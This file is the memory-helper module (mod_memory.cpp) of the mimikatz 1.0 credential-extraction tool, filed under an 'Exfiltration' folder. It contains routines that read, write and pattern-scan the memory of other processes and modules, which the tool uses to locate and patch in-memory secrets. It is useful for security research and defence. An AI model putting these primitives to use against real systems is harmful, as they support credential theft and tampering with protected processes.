Exfiltration/mimikatz-1.0/modules/mod_memory.cpp


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140

/*	Benjamin DELPY `gentilkiwi`
	http://blog.gentilkiwi.com
	benjamin@gentilkiwi.com
	Licence : http://creativecommons.org/licenses/by/3.0/fr/
*/
#include "mod_memory.h"

bool mod_memory::readMemory(const void * adresseBase, void * adresseDestination, size_t longueur, HANDLE handleProcess)
{
	if(handleProcess == INVALID_HANDLE_VALUE)
	{
		return (memcpy_s(adresseDestination, longueur, adresseBase, longueur) == 0);
	}
	else
	{
		SIZE_T dwBytesRead = 0;
		return ((ReadProcessMemory(handleProcess, adresseBase, adresseDestination, longueur, &dwBytesRead) != 0) && (dwBytesRead == longueur));
	}
}

bool mod_memory::writeMemory(void * adresseBase, const void * adresseSource, size_t longueur, HANDLE handleProcess)
{
	bool reussite = false;
	DWORD OldProtect, OldProtect2;

	if(handleProcess == INVALID_HANDLE_VALUE)
	{
		if(VirtualProtect(adresseBase, longueur, PAGE_EXECUTE_READWRITE, &OldProtect) != 0)
		{
			reussite = (memcpy_s(adresseBase, longueur, adresseSource, longueur) == 0);
			VirtualProtect(adresseBase, longueur, OldProtect, &OldProtect2);
		}		
	}
	else
	{
		if(VirtualProtectEx(handleProcess, adresseBase, longueur, PAGE_EXECUTE_READWRITE, &OldProtect) != 0)
		{
			SIZE_T dwBytesWrite = 0;
			reussite = ((WriteProcessMemory(handleProcess, adresseBase, adresseSource, longueur, &dwBytesWrite) != 0) && (dwBytesWrite == longueur));
			VirtualProtectEx(handleProcess, adresseBase, longueur, OldProtect, &OldProtect2);
		}
	}

	return reussite;
}


bool mod_memory::searchMemory(const PBYTE adresseBase, const PBYTE adresseMaxMin, const PBYTE pattern, PBYTE * addressePattern, size_t longueur, bool enAvant, HANDLE handleProcess)
{
	BYTE * monTab = new BYTE[longueur];
	*addressePattern = adresseBase;
	bool succesLecture = true;
	bool succesPattern = false;
	
	while((!adresseMaxMin || (enAvant ? (*addressePattern + longueur) <= adresseMaxMin : (*addressePattern - longueur) >= adresseMaxMin)) && succesLecture && !succesPattern)
	{
		if(succesLecture = readMemory(*addressePattern, monTab, longueur, handleProcess))
		{
			if(!(succesPattern = (memcmp(monTab, pattern, longueur) == 0)))
			{
				*addressePattern += (enAvant ? 1 : -1);
			}
		}
	}
	delete[] monTab;

	if(!succesPattern)
		*addressePattern = NULL;

	return succesPattern;
}

bool mod_memory::searchMemory(const PBYTE adresseBase, const long offsetMaxMin, const PBYTE pattern, long * offsetPattern, size_t longueur, bool enAvant, HANDLE handleProcess)
{
	PBYTE addressePattern = NULL;
	bool resultat = mod_memory::searchMemory(adresseBase, (offsetMaxMin != 0 ? (adresseBase + offsetMaxMin) : NULL), pattern, &addressePattern, longueur, enAvant, handleProcess);
	*offsetPattern =  addressePattern - adresseBase;
	return resultat;
}

bool mod_memory::genericPatternSearch(PBYTE * thePtr, wchar_t * moduleName, BYTE pattern[], ULONG taillePattern, LONG offSetToPtr, char * startFunc, bool enAvant, bool noPtr)
{
	bool resultat = false;
	if(thePtr && pattern && taillePattern)
	{
		if(HMODULE monModule = GetModuleHandle(moduleName))
		{
			MODULEINFO mesInfos;
			if(GetModuleInformation(GetCurrentProcess(), monModule, &mesInfos, sizeof(MODULEINFO)))
			{
				PBYTE addrMonModule = reinterpret_cast<PBYTE>(mesInfos.lpBaseOfDll);

				if(PBYTE addrDebut = startFunc ? reinterpret_cast<PBYTE>(GetProcAddress(monModule, startFunc)) : addrMonModule)
				{
					if(resultat = mod_memory::searchMemory(addrDebut, enAvant ? (addrMonModule + mesInfos.SizeOfImage) : reinterpret_cast<PBYTE>(mesInfos.lpBaseOfDll), pattern, thePtr, taillePattern, enAvant))
					{
						*thePtr += offSetToPtr;
						if(!noPtr)
						{
#ifdef _M_X64
							*thePtr += sizeof(long) + *reinterpret_cast<long *>(*thePtr);
#elif defined _M_IX86
							*thePtr = *reinterpret_cast<PBYTE *>(*thePtr);
#endif
						}
					}
					else *thePtr = NULL;
				}
			}
		}
	}
	return resultat;
}

/*bool mod_memory::WhereIsMyFuckingRelativePattern(const PBYTE adresseBase, const PBYTE addrPattern, const PBYTE maskPattern, PBYTE *addressePattern, size_t longueurMask, const long offsetAddrInMask, const long offset) // et merde je la documente pas celle là !
{
	PBYTE autreAddr = adresseBase;
	PBYTE monMask = new BYTE[longueurMask];
	PBYTE monTab  = new BYTE[longueurMask];

	RtlCopyMemory(monMask, maskPattern, longueurMask);
	bool succesLecture = false, succesPattern = false;
	do
	{
		PBYTE funkyDiff = reinterpret_cast<PBYTE>(addrPattern - (autreAddr + offsetAddrInMask + 4));
		RtlCopyMemory(monMask+offsetAddrInMask, reinterpret_cast<PBYTE>(&funkyDiff), 4);
		succesLecture = readMemory(autreAddr, monTab, longueurMask);
		succesPattern = memcmp(monTab, monMask, longueurMask) == 0;
		autreAddr+=offset;
	} while(!succesPattern && succesLecture);

	delete[] monMask;

	if(succesPattern && succesLecture)
	{
		*addressePattern = autreAddr-offset;
		return true;
	}
	else return false;
}*/